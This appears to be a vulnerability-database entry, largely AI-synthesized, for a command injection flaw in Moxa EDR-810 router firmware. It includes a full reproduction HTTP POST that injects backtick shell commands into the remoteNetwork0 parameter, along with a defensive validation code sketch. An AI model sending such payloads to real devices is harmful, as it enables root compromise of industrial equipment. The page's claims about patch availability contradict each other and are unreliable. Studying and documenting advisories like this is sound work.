CVE-2017-14433
Description
An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into the remoteNetwork0= parameter in the "/goform/net_Web_get_value" uri to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Command injection in Moxa EDR-810 web interface allows authenticated attackers to execute arbitrary OS commands as root.
Vulnerability
The Moxa EDR-810 industrial VPN router running firmware version V4.1 build 17030317 contains an OS command injection vulnerability in the web server. The remoteNetwork0= parameter in the /goform/net_Web_get_value endpoint is not properly sanitized before being used in a system command. An authenticated user can inject arbitrary OS commands via a specially crafted HTTP POST request [1].
Exploitation
An attacker must first authenticate to the device's web interface. Once logged in, a POST request to /goform/net_Web_get_value with the remoteNetwork0 parameter containing command injection payloads (e.g., using backticks or semicolons) will be executed. The web server runs with root privileges, so injected commands run as root [1].
Impact
Successful exploitation allows an attacker to execute arbitrary OS commands with root privileges, leading to full compromise of the device. This includes the ability to read, modify, or delete sensitive data, install malware, pivot to internal networks, and disrupt operations [1].
Mitigation
Moxa has not released a firmware patch for this vulnerability as of the advisory date (2017). Users should restrict network access to the web interface to trusted IPs only, disable the web interface if not required, and monitor for unauthorized access. The device is not listed in CISA's Known Exploited Vulnerabilities catalog [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Talos/Moxa, v5, Range: Moxa EDR-810 V4.1 build 17030317
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Improper neutralization of special elements in the `remoteNetwork0=` parameter allows OS command injection."
Attack vector
An attacker must first authenticate to the device's web interface. Once logged in, they send a crafted HTTP POST to `/goform/net_Web_get_value` with the `remoteNetwork0=` parameter containing injected OS commands wrapped in backticks (e.g., `` `sleep+10` ``). The web server, running as root, executes the injected commands with root privileges, resulting in privilege escalation to a root shell [1].
Affected code
The vulnerable endpoint is `/goform/net_Web_get_value` with the parameter `remoteNetwork0=`. The web server processes this parameter without sanitization before passing it to an OS command, and the server runs as root [1].
What the fix does
The advisory states the vendor patched and published new firmware on 2018-04-12, but no patch diff is included in the bundle. The remediation guidance is to update to the patched firmware version, which presumably adds proper input sanitization or escaping for the `remoteNetwork0=` parameter before it is used in OS command execution [1].
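A sketch of the kind of allow-list validation the paragraph above presumes, as an added example that is not Moxa's code and not taken from the advisory. The function names are hypothetical, and it assumes the handler holds the URL-decoded `remoteNetwork0` and `remoteNetmask0` values as C strings and that both are meant to be dotted-quad IPv4 values.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <string.h>

/* Strict dotted-quad check: allow-list the characters first, then let
 * inet_pton() do the parsing. Anything a shell would interpret (backtick,
 * ';', '$', '|', space, ...) already fails the character check. */
int is_ipv4_literal(const char *s, struct in_addr *out)
{
    size_t len;

    if (s == NULL)
        return 0;
    len = strlen(s);
    if (len < 7 || len > 15)            /* "0.0.0.0" .. "255.255.255.255" */
        return 0;
    if (strspn(s, "0123456789.") != len)
        return 0;
    return inet_pton(AF_INET, s, out) == 1;
}

/* A netmask must additionally be a contiguous run of 1 bits. */
int is_ipv4_netmask(const char *s)
{
    struct in_addr a;
    uint32_t m, inv;

    if (!is_ipv4_literal(s, &a))
        return 0;
    m = ntohl(a.s_addr);
    inv = ~m;                           /* host bits; must look like 0..01..1 */
    return (inv & (inv + 1)) == 0;
}

/* Hypothetical gate for the decoded remoteNetwork0 / remoteNetmask0 pair.
 * Returns 1 only if both values are acceptable; the caller should reject
 * the request otherwise instead of trying to escape the input. */
int validate_remote_network(const char *network, const char *netmask)
{
    struct in_addr net;

    return is_ipv4_literal(network, &net) && is_ipv4_netmask(netmask);
}
```

Validation of this kind is best paired with invoking the helper program through an argument vector rather than a shell command string, so that a value which slips past the check is still never parsed by a shell.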
Preconditions
- auth: Attacker must have valid credentials to log in to the device's web interface
- network: Attacker must be able to reach the device's web server over the network
- input: Attacker sends a crafted HTTP POST with command injection payload in the remoteNetwork0 parameter
Reproduction
Send the following HTTP POST request to the target device (replace the Host IP as needed):
```
POST /goform/net_Web_get_value?SRV=SRV_OPENVPN_SERVER_USER HTTP/1.1
Host: 192.168.127.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.127.254/openvpn_user.asp
Cookie: NAME=admin; PASSWORD=1cf17e0c60ed7ecb0977fdfc0e218c65; AUTHORITY=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

openvpnServer0_tmp=AAAA%2Bvvvvv%2B%60sleep%2B10%60%2B%60sleep%2B10%60%2B&ovpnServerId=1&username0=AAAA&password0=vvvvv&password_c=vvvvv&remoteNetwork0=%60sleep%2B10%60&remoteNetmask0=%60sleep%2B10%60
```
The backtick-enclosed commands in `remoteNetwork0=` (e.g., `` `sleep+10` ``) will be executed by the server with root privileges [1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. www.talosintelligence.com/vulnerability_reports/TALOS-2017-0482 (mitre, x_refsource_MISC)